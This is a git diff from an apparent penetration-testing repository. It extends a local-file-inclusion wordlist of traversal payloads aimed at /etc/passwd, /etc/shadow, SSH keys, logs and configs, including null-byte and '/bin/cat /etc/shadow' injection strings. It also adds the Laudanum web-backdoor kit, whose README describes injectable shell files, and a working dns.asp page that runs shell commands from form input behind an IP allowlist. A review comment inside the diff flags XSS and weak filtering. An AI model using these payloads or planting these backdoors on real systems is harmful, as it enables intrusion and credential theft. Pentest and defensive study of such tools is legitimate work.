@@ -285,8 +549,6 @@ /usr/spool/lp/log /usr/spool/mqueue/syslog /var/adm -/var/adm/SYSLOG -/var/adm/X0msgs /var/adm/acct/sum/loginlog /var/adm/aculog /var/adm/aculogs @@ -294,10 +556,11 @@ /var/adm/crash/vmcore /var/adm/cron/log /var/adm/dtmp +/var/adm/lastlog /var/adm/lastlog/username /var/adm/log/asppp.log -/var/adm/log/xferlog /var/adm/loginlog +/var/adm/log/xferlog /var/adm/lp/lpd-errs /var/adm/messages /var/adm/pacct 
@@ -305,56 +568,79 @@ /var/adm/ras/bootlog /var/adm/ras/errlog /var/adm/sulog +/var/adm/SYSLOG /var/adm/utmp /var/adm/utmpx /var/adm/vold.log /var/adm/wtmp /var/adm/wtmpx +/var/adm/X0msgs /var/apache/log /var/apache/logs /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/cron/log +/var/lib/mlocate/mlocate.db /var/lib/mysql/my.cnf /var/local/www/conf/php.ini /var/lock/samba /var/log -/var/log/POPlog -/var/log/access.log /var/log/access_log +/var/log/access.log +../../../../../../../var/log/access_log +../../../../../../../var/log/access.log +../../../../../var/log/access_log /var/log/acct +/var/log/apache2/access_log +/var/log/apache2/access.log +../../../../../../../var/log/apache2/access_log +../../../../../../../var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +../../../../../../../var/log/apache2/error_log +../../../../../../../var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +../../../../../../../var/log/apache/access_log +../../../../../../../var/log/apache/access.log +../../../../../var/log/apache/access_log +../../../../../var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +../../../../../../../var/log/apache/error_log +../../../../../../../var/log/apache/error.log +../../../../../var/log/apache/error_log +../../../../../var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log -/var/log/apache/access.log -/var/log/apache/access_log -/var/log/apache/error.log -/var/log/apache/error_log -/var/log/apache2/access.log -/var/log/apache2/access_log -/var/log/apache2/error.log -/var/log/apache2/error_log /var/log/auth -/var/log/auth.log /var/log/authlog +/var/log/auth.log /var/log/boot.log /var/log/cron.log -/var/log/error.log +/var/log/dmesg /var/log/error_log -/var/log/exim/mainlog -/var/log/exim/paniclog -/var/log/exim/rejectlog +/var/log/error.log +../../../../../../../var/log/error_log 
+../../../../../../../var/log/error.log +../../../../../var/log/error_log /var/log/exim_mainlog +/var/log/exim/mainlog /var/log/exim_paniclog +/var/log/exim/paniclog /var/log/exim_rejectlog +/var/log/exim/rejectlog +/var/log/ftplog /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log -/var/log/ftplog /var/log/httpd/ -/var/log/httpd/access.log /var/log/httpd/access_log -/var/log/httpd/error.log +/var/log/httpd/access.log +../../../../../var/log/httpd/access_log /var/log/httpd/error_log +/var/log/httpd/error.log +../../../../../var/log/httpd/error_log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log @@ -363,12 +649,12 @@ /var/log/maillog /var/log/message /var/log/messages +/var/log/mysqlderror.log +/var/log/mysqld.log /var/log/mysql.log /var/log/mysql/mysql-bin.log -/var/log/mysql/mysql-slow.log /var/log/mysql/mysql.log -/var/log/mysqld.log -/var/log/mysqlderror.log +/var/log/mysql/mysql-slow.log /var/log/ncftpd.errs /var/log/ncftpd/misclog.txt /var/log/news @@ -381,12 +667,13 @@ /var/log/news/suck.err /var/log/news/suck.notice /var/log/poplog +/var/log/POPlog /var/log/proftpd /var/log/proftpd.access_log /var/log/proftpd.xferlog /var/log/proftpd/xferlog.legacy -/var/log/pure-ftpd/pure-ftpd.log /var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log /var/log/qmail /var/log/qmail/ /var/log/samba @@ -406,6 +693,8 @@ /var/lp/logs/lpsched /var/lp/logs/requests /var/mysql.log +/var/run/httpd.pid +/var/run/mysqld/mysqld.pid /var/run/utmp /var/saf/_log /var/saf/port/log 
@@ -418,296 +707,36 @@ /var/www/localhost/htdocs/.htaccess /var/www/log/access_log /var/www/log/error_log -/var/www/logs/access.log +/../../var/www/logs/access_log /var/www/logs/access_log -/var/www/logs/error.log +/var/www/logs/access.log +../../../../../../../var/www/logs/access_log +../../../../../../../var/www/logs/access.log +../../../../../var/www/logs/access.log /var/www/logs/error_log +/var/www/logs/error.log +../../../../../../../var/www/logs/error_log +../../../../../../../var/www/logs/error.log +../../../../../var/www/logs/error_log +../../../../../var/www/logs/error.log /var/www/sitename/htdocs/ /var/www/vhosts/sitename/httpdocs/.htaccess /var/www/web1/html/.htaccess +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default /web/conf/php.ini +/WINDOWS\php.ini +../../windows/win.ini +/WINNT\php.ini +/..\..\..\..\..\..\winnt\win.ini /www/logs/proftpd.system.log /xampp\apache\bin\php.ini -C:/boot.ini -C:/inetpub/wwwroot/global.asa -C:\boot.ini -C:\inetpub\wwwroot\global.asa -\..\..\..\..\..\..\..\..\..\..\boot.ini -\..\..\..\..\..\..\..\..\..\..\etc\passwd -\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -\..\..\..\..\..\..\..\..\..\..\etc\shadow -\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -\\'/bin/cat%20/etc/passwd\\' -\\'/bin/cat%20/etc/shadow\\' -c:\Program Files\Apache Group\Apache\logs\access.log -c:\Program Files\Apache Group\Apache\logs\error.log -c:\System32\Inetsrv\metabase.xml -c:\apache\logs\access.log -c:\apache\logs\error.log -c:\inetpub\wwwroot\index.asp -d:\System32\Inetsrv\metabase.xml 
-/var/log/mysqld.log -/etc/passwd -/etc/shadow -/etc/hosts -/etc/hosts.allow -/etc/hosts.equiv -/etc/hosts.deny -/etc/ssh/sshd_config -/etc/apache/httpd.conf -/etc/resolv.conf -/var/log/message -/etc/inetd.conf -/etc/crontab -/etc/defaultdomain -/etc/rpc -/.rhosts -/.shosts -/.ssh/authorized_keys -/.bash_history -/.bash_profile -/.sh_history -/.profile -/.bashrc -/.logout -/.Xauthority -/.netrc -/.cshrc -/etc/hostname.hme0 -/etc/hostname.pcn0 -/etc/hostname.iprb0 -/etc/hostname.qfe0 -/etc/hostname.eri0 -/etc/hostname.bge -/etc/hostname.ce0 -/etc/hostname.dmfe0 -/etc/hostname.dnet0 -/etc/hostname.elx0 -/etc/hostname.elxl0 -/etc/hostname.spwr0 -/etc/hostname.eri0 -/etc/hostname.ge0 -/etc/hostname.ieef0 -/etc/hostname.le0 -/etc/hostname.dcelx0 -/etc/hostname.ecn0 -/etc/hostname.lo -/etc/hostname.hme1 -/etc/hostname.pcn1 -/etc/hostname.iprb1 -/etc/hostname.qfe1 -/etc/hostname.eri1 -/etc/hostname.bge -/etc/hostname.ce1 -/etc/hostname.dmfe1 -/etc/hostname.dnet1 -/etc/hostname.elx1 -/etc/hostname.elxl1 -/etc/hostname.spwr1 -/etc/hostname.eri1 -/etc/hostname.ge1 -/etc/hostname.ieef1 -/etc/hostname.le1 -/etc/hostname.dcelx1 -/etc/hostname.ecn1 -/etc/hostname.lo -/etc/hostname.hme2 -/etc/hostname.pcn2 -/etc/hostname.iprb2 -/etc/hostname.qfe2 -/etc/hostname.eri2 -/etc/hostname.bge -/etc/hostname.ce2 -/etc/hostname.dmfe2 -/etc/hostname.dnet2 -/etc/hostname.elx2 -/etc/hostname.elxl2 -/etc/hostname.spwr2 -/etc/hostname.eri2 -/etc/hostname.ge2 -/etc/hostname.ieef2 -/etc/hostname.le2 -/etc/hostname.dcelx2 -/etc/hostname.ecn2 -/etc/hostname.lo -/etc/hostname.hme3 -/etc/hostname.pcn3 -/etc/hostname.iprb3 -/etc/hostname.qfe3 -/etc/hostname.eri3 -/etc/hostname.bge -/etc/hostname.ce3 -/etc/hostname.dmfe3 -/etc/hostname.dnet3 -/etc/hostname.elx3 -/etc/hostname.elxl3 -/etc/hostname.spwr3 -/etc/hostname.eri3 -/etc/hostname.ge3 -/etc/hostname.ieef3 -/etc/hostname.le3 -/etc/hostname.dcelx3 -/etc/hostname.ecn3 -/etc/hostname.lo -/etc/default/passwd -/etc/syslog.conf -/etc/syslogd.conf 
-/etc/release -/etc/motd -/etc/issue -/etc/group -/etc/nsswitch.conf -/etc/opt/ipf/ipf.conf -/etc/opt/ipf/ipnat.conf -/etc/vfstab -/etc/system -/etc/defaultrouter -/var/adm/messages -/var/log/syslog -/var/adm/utmpx -/var/adm/loginlog -/var/adm/lastlog -/etc/netconfig -/var/log/authlog -/log/miscDir/accesslog -/etc/sudoers -/etc/httpd/conf/httpd.conf -/etc/make.conf -/etc/apt/sources.list -/etc/passwd -/etc/shadow -/etc/hosts -/etc/hosts.allow -/etc/hosts.equiv -/etc/hosts.deny -/etc/ssh/sshd_config -/etc/apache/httpd.conf -/etc/resolv.conf -/var/log/messages -/var/log/dmesg -/etc/inetd.conf -/etc/crontab -/etc/defaultdomain -/etc/rpc -/.rhosts -/.shosts -/.ssh/authorized_keys -/.bash_history -/.bash_profile -/.sh_history -/.profile -/.bashrc -/.logout -/.Xauthority -/.netrc -/.forward -/.cshrc -/etc/default/passwd -/etc/syslog.conf -/etc/syslogd.conf -/etc/release -/etc/issue -/etc/motd -/etc/group -/etc/fstab -/etc/nsswitch.conf -/etc/vfstab -/etc/system -/var/log/syslog -/etc/netconfig -/var/log/authlog -/log/miscDir/accesslog -/etc/sudoers -/etc/updatedb.conf -/etc/httpd/conf.d/ssl.conf -/etc/httpd/conf.d/php.conf -/etc/httpd/conf.d/squirrelmail.conf -/var/log/httpd/error_log -/var/log/httpd/access_log -/var/log/apache/error_log -/var/log/apache/access_log -/var/log/apache2/error_log -/var/log/apache2/access_log -/etc/logrotate.d/httpd -/var/run/httpd.pid -/proc/cpuinfo -/proc/version -/etc/php.ini -/etc/php.d/dom.ini -/etc/php.d/gd.ini -/etc/php.d/imap.ini -/etc/php.d/json.ini -/etc/php.d/ldap.ini -/etc/php.d/mbstring.ini -/etc/php.d/mysql.ini -/etc/php.d/mysqli.ini -/etc/php.d/odbc.ini -/etc/php.d/pdo.ini -/etc/php.d/pdo_mysql.ini -/etc/php.d/pdo_odbc.ini -/etc/php.d/pdo_pgsql.ini -/etc/php.d/pdo_sqlite.ini -/etc/php.d/pgsql.ini -/etc/php.d/xmlreader.ini -/etc/php.d/xmlwriter.ini -/etc/php.d/xsl.ini -/etc/php.d/zip.ini -/etc/my.cnf -/var/run/mysqld/mysqld.pid -/var/log/mysqld.log -/var/log/httpd/access.log -/var/log/httpd/error.log -/var/log/httpd/access_log 
-/var/log/httpd/error_log -/apache/logs/error_log -/apache/logs/access_log -/apache/logs/error.log -/apache/logs/access.log -/logs/error_log -/logs/access_log -/logs/error.log -/logs/access.log -/etc/httpd/logs/access_log -/etc/httpd/logs/access.log -/etc/httpd/logs/error_log -/etc/httpd/logs/error.log -/usr/local/apache/logs/access_log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/error_log -/usr/local/apache/logs/error.log -/var/log/apache/access_log -/var/log/apache/access.log -/var/log/apache/error_log -/var/log/apache/error.log -/var/www/logs/access_log -/var/www/logs/access.log -/var/www/logs/error_log -/var/www/logs/error.log -/var/log/access_log -/var/log/error_log -/var/log/access.log -/var/log/error.log -/usr/local/apache2/logs/access_log -/usr/local/apache2/logs/access.log -/usr/local/apache2/logs/error_log -/usr/local/apache2/logs/error.log -/var/log/apache2/access_log -/var/log/apache2/access.log -/var/log/apache2/error_log -/var/log/apache2/error.log -/apache2/logs/error_log -/apache2/logs/access_log -/apache2/logs/error.log -/apache2/logs/access.log -/var/lib/mlocate/mlocate.db -/proc/meminfo -/proc/net/route -/proc/net/tcp -/proc/net/arp -/proc/net/dev -/proc/partitions -/proc/mounts -/proc/loadavg -/boot/grub/grub.conf -/etc/mailman/mm_cfg.py -/etc/postfix/mydomains \ No newline at end of file +/.Xauthority \ No newline at end of file diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS new file mode 100644 index 0000000..69b9a81 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS 
@@ -0,0 +1,17 @@
+The Team
+========================================================
+- Kevin Johnson
+ - Project Lead
+
+- Justin Searle
+ - Core Developer
+
+- Tim Medin
+ - Core Developer
+
+- James Jardine
+ - Core Developer
+
+Additional Coding
+========================================================
+- Robin Wood
diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL
new file mode 100644
index 0000000..8155770
--- /dev/null
+++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL
@@ -0,0 +1,258 @@ +The GNU General Public License (GPL) +Version 2, June 1991 + +Copyright (C) 1989, 1991 Free Software Foundation, Inc. +59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + +Everyone is permitted to copy and distribute verbatim copies +of this license document, but changing it is not allowed. + +Preamble + +The licenses for most software are designed to take away your freedom to share +and change it. By contrast, the GNU General Public License is intended to +guarantee your freedom to share and change free software--to make sure the +software is free for all its users. This General Public License applies to most +of the Free Software Foundation's software and to any other program whose +authors commit to using it. (Some other Free Software Foundation software is +covered by the GNU Library General Public License instead.) You can apply it to +your programs, too. + +When we speak of free software, we are referring to freedom, not price. Our +General Public Licenses are designed to make sure that you have the freedom to +distribute copies of free software (and charge for this service if you wish), +that you receive source code or can get it if you want it, that you can change +the software or use pieces of it in new free programs; and that you know you can +do these things. + +To protect your rights, we need to make restrictions that forbid anyone to deny +you these rights or to ask you to surrender the rights. These restrictions +translate to certain responsibilities for you if you distribute copies of the +software, or if you modify it. + +For example, if you distribute copies of such a program, whether gratis or for +a fee, you must give the recipients all the rights that you have. You must make +sure that they, too, receive or can get the source code. And you must show them +these terms so they know their rights. 
+ +We protect your rights with two steps: (1) copyright the software, and (2) +offer you this license which gives you legal permission to copy, distribute +and/or modify the software. + +Also, for each author's protection and ours, we want to make certain that +everyone understands that there is no warranty for this free software. If the +software is modified by someone else and passed on, we want its recipients to +know that what they have is not the original, so that any problems introduced +by others will not reflect on the original authors' reputations. + +Finally, any free program is threatened constantly by software patents. We wish +to avoid the danger that redistributors of a free program will individually +obtain patent licenses, in effect making the program proprietary. To prevent +this, we have made it clear that any patent must be licensed for everyone's free +use or not licensed at all. + +The precise terms and conditions for copying, distribution and modification +follow. + +TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + +0. This License applies to any program or other work which contains a notice +placed by the copyright holder saying it may be distributed under the terms of +this General Public License. The "Program", below, refers to any such program or +work, and a "work based on the Program" means either the Program or any +derivative work under copyright law: that is to say, a work containing the +Program or a portion of it, either verbatim or with modifications and/or +translated into another language. (Hereinafter, translation is included without +limitation in the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not covered by +this License; they are outside its scope. 
The act of running the Program is not +restricted, and the output from the Program is covered only if its contents +constitute a work based on the Program (independent of having been made by +running the Program). Whether that is true depends on what the Program does. + +1. You may copy and distribute verbatim copies of the Program's source code as +you receive it, in any medium, provided that you conspicuously and appropriately +publish on each copy an appropriate copyright notice and disclaimer of warranty; +keep intact all the notices that refer to this License and to the absence of any +warranty; and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and you may at +your option offer warranty protection in exchange for a fee. + +2. You may modify your copy or copies of the Program or any portion of it, thus +forming a work based on the Program, and copy and distribute such modifications +or work under the terms of Section 1 above, provided that you also meet all of +these conditions: + + a) You must cause the modified files to carry prominent notices stating that + you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in whole or + in part contains or is derived from the Program or any part thereof, to be + licensed as a whole at no charge to all third parties under the terms of + this License. + + c) If the modified program normally reads commands interactively when run, + you must cause it, when started running for such interactive use in the most + ordinary way, to print or display an announcement including an appropriate + copyright notice and a notice that there is no warranty (or else, saying + that you provide a warranty) and that users may redistribute the program + under these conditions, and telling the user how to view a copy of this + License. 
(Exception: if the Program itself is interactive but does not + normally print such an announcement, your work based on the Program is not + required to print an announcement.) + +These requirements apply to the modified work as a whole. If identifiable +sections of that work are not derived from the Program, and can be reasonably +considered independent and separate works in themselves, then this License, and +its terms, do not apply to those sections when you distribute them as separate +works. But when you distribute the same sections as part of a whole which is a +work based on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the entire whole, +and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest your +rights to work written entirely by you; rather, the intent is to exercise the +right to control the distribution of derivative or collective works based on the +Program. + +In addition, mere aggregation of another work not based on the Program with the +Program (or with a work based on the Program) on a volume of a storage or +distribution medium does not bring the other work under the scope of this +License. + +3. 
You may copy and distribute the Program (or a work based on it, under +Section 2) in object code or executable form under the terms of Sections 1 and 2 +above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable source + code, which must be distributed under the terms of Sections 1 and 2 above on + a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three years, to + give any third party, for a charge no more than your cost of physically + performing source distribution, a complete machine-readable copy of the + corresponding source code, to be distributed under the terms of Sections 1 + and 2 above on a medium customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer to + distribute corresponding source code. (This alternative is allowed only for + noncommercial distribution and only if you received the program in object + code or executable form with such an offer, in accord with Subsection b + above.) + +The source code for a work means the preferred form of the work for making +modifications to it. For an executable work, complete source code means all +the source code for all modules it contains, plus any associated interface +definition files, plus the scripts used to control compilation and installation +of the executable. However, as a special exception, the source code distributed +need not include anything that is normally distributed (in either source or +binary form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component itself +accompanies the executable. 
+ +If distribution of executable or object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the source code +from the same place counts as distribution of the source code, even though third +parties are not compelled to copy the source along with the object code. + +4. You may not copy, modify, sublicense, or distribute the Program except as +expressly provided under this License. Any attempt otherwise to copy, modify, +sublicense or distribute the Program is void, and will automatically terminate +your rights under this License. However, parties who have received copies, or +rights, from you under this License will not have their licenses terminated so +long as such parties remain in full compliance. + +5. You are not required to accept this License, since you have not signed it. +However, nothing else grants you permission to modify or distribute the Program +or its derivative works. These actions are prohibited by law if you do not +accept this License. Therefore, by modifying or distributing the Program (or any +work based on the Program), you indicate your acceptance of this License to do +so, and all its terms and conditions for copying, distributing or modifying the +Program or works based on it. + +6. Each time you redistribute the Program (or any work based on the Program), +the recipient automatically receives a license from the original licensor to +copy, distribute or modify the Program subject to these terms and conditions. +You may not impose any further restrictions on the recipients' exercise of the +rights granted herein. You are not responsible for enforcing compliance by third +parties to this License. + +7. 
If, as a consequence of a court judgment or allegation of patent infringement +or for any other reason (not limited to patent issues), conditions are imposed +on you (whether by court order, agreement or otherwise) that contradict the +conditions of this License, they do not excuse you from the conditions of this +License. If you cannot distribute so as to satisfy simultaneously your +obligations under this License and any other pertinent obligations, then as a +consequence you may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by all those +who receive copies directly or indirectly through you, then the only way you +could satisfy both it and this License would be to refrain entirely from +distribution of the Program. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply and the +section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any patents or +other property right claims or to contest validity of any such claims; this +section has the sole purpose of protecting the integrity of the free software +distribution system, which is implemented by public license practices. Many +people have made generous contributions to the wide range of software +distributed through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing to +distribute software through any other system and a licensee cannot impose that +choice. + +This section is intended to make thoroughly clear what is believed to be a +consequence of the rest of this License. + +8. 
If the distribution and/or use of the Program is restricted in certain +countries either by patents or by copyrighted interfaces, the original copyright +holder who places the Program under this License may add an explicit +geographical distribution limitation excluding those countries, so that +distribution is permitted only in or among countries not thus excluded. In such +case, this License incorporates the limitation as if written in the body of +this License. + +9. The Free Software Foundation may publish revised and/or new versions of the +General Public License from time to time. Such new versions will be similar in +spirit to the present version, but may differ in detail to address new problems +or concerns. + +Each version is given a distinguishing version number. If the Program specifies +a version number of this License which applies to it and "any later version", +you have the option of following the terms and conditions either of that version +or of any later version published by the Free Software Foundation. If the +Program does not specify a version number of this License, you may choose any +version ever published by the Free Software Foundation. + +10. If you wish to incorporate parts of the Program into other free programs +whose distribution conditions are different, write to the author to ask +for permission. For software which is copyrighted by the Free Software +Foundation, write to the Free Software Foundation; we sometimes make exceptions +for this. Our decision will be guided by the two goals of preserving the free +status of all derivatives of our free software and of promoting the sharing and +reuse of software generally. + +NO WARRANTY + +11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE +PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN OTHERWISE STATED +IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS +IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT +NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + +12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL +ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE +PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, +SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY +TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF +THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER +PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README new file mode 100644 index 0000000..2a301ae --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README 
@@ -0,0 +1,35 @@
+Laudanum: Injectable Web Exploit Code v0.4
+
+By Kevin Johnson
+ and the Laudanum Development Team
+
+Project Website: http://laudanum.secureideas.net
+Sourceforge Site: http://sourceforge.net/projects/laudanum
+
+SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
+
+-------------------------------------------------------------------------------
+** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team
+**
+** This program is free software; you can redistribute it and/or modify
+** it under the terms of the GNU General Public License as published by
+** the Free Software Foundation; either version 2 of the License, or
+** (at your option) any later version.
+**
+** This program is distributed in the hope that it will be useful,
+** but WITHOUT ANY WARRANTY; without even the implied warranty of
+** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+** GNU General Public License for more details.
+**
+** You should have received a copy of the GNU General Public License
+** along with this program; if not, write to the Free Software
+** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
+-------------------------------------------------------------------------------
+
+I. ABOUT
+_____________________________________
+Laudanum is a collection of injectable files, designed to be used in a pentest
+when upload vulnerabilities, administrative interfaces, and SQL injection flaws
+are found. These files are written in multiple languages for different
+environments. They provide functionality such as shell, DNS query, LDAP
+retrieval and others.
diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp new file mode 100644 index 0000000..317c3ee --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp 
@@ -0,0 +1,153 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** This file provides access to DNS on the system. +' *** Written by Tim Medin +' *** +' ******************************************************************************** +' *** This program is free software; you can redistribute it and/or +' *** modify it under the terms of the GNU General Public License +' *** as published by the Free Software Foundation; either version 2 +' *** of the License, or (at your option) any later version. +' *** +' *** This program is distributed in the hope that it will be useful, +' *** but WITHOUT ANY WARRANTY; without even the implied warranty of +' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +' *** GNU General Public License for more details. +' *** +' *** You can get a copy of the GNU General Public License from this +' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +' *** You can also write to the Free Software Foundation, Inc., Temple +' *** Place - Suite Boston, MA USA. 
+' *** +' ***************************************************************************** */ + +' ***************** Config entries below *********************** + +' IPs are enterable as individual addresses TODO: add CIDR support +Dim allowedIPs +Dim allowed +Dim qtypes +Dim qtype +Dim validtype +Dim query +Dim i +Dim command + +allowedIPs = "192.168.0.1,127.0.0.1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = split(allowedIPS,",") ' + +' make sure the ip is allowed +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + Exit For + end if +next +' send a 404 if not the allowed IP +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + +%> + + + Laudanum ASP DNS Access + + + + + + +

DNS Query 0.1

+<% + +' dns query types as defined as by windows nslookup +qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",") +qtype = UCase(Request.Form("type")) + +' see if the query type is valid, if it isn't then set it. +validtype = 0 +for i = lbound(qtypes) to ubound(qtypes) + if qtype = qtypes(i) then + validtype = 1 + Exit For + end if +next +if validtype = 0 then qtype = "ANY" + +%> +
+
+ DNS Lookup: +

Query: + Type: + +

+
+<% + +' get the query +query = trim(Request.Form("query")) +' the query must be sanitized a bit to try to make sure the shell doesn't hang +query = replace(query, " ", "") +query = replace(query, ";", "") + +if len(query) > 0 then + command = "nslookup -type=" & qtype & " " & query + Set objWShell = Server.CreateObject("WScript.Shell") + Set objCmd = objWShell.Exec(command) + strPResult = objCmd.StdOut.Readall() + set objCmd = nothing: Set objWShell = nothing + %>
<%
+	Response.Write command & "
" + Response.Write replace(strPResult,vbCrLf,"
") + %>
<% +end if +%> +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp new file mode 100644 index 0000000..cc0faff --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp 
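Review bot: The two `Response.Write` calls that follow `objCmd.StdOut.Readall()` in dns.asp put `command` and the nslookup output into the page without encoding, so markup in the submitted query or in a DNS answer (which the person using the page does not control) is rendered in that person's browser. Encode both before writing, e.g. `Response.Write Server.HTMLEncode(command)` and `Server.HTMLEncode(strPResult)` inside the existing `replace(...)` call. `qtype` is checked against a fixed list before use, but `query` is only stripped of spaces and semicolons before it is concatenated into `command`; it deserves the same treatment, rejecting anything that is not a plain hostname or IP literal. The `allowedIPs` default here also omits `::1`, which the file.asp hunk in this commit includes, so the two files behave differently for IPv6 loopback.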
@@ -0,0 +1,179 @@
+<%@Language="VBScript"%>
+<%Option Explicit%>
+<%Response.Buffer = True%>
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' *** http://laudanum.secureideas.net
+' *** laudanum@secureideas.net
+' ***
+' *** Project Leads:
+' *** Kevin Johnson
+' ***
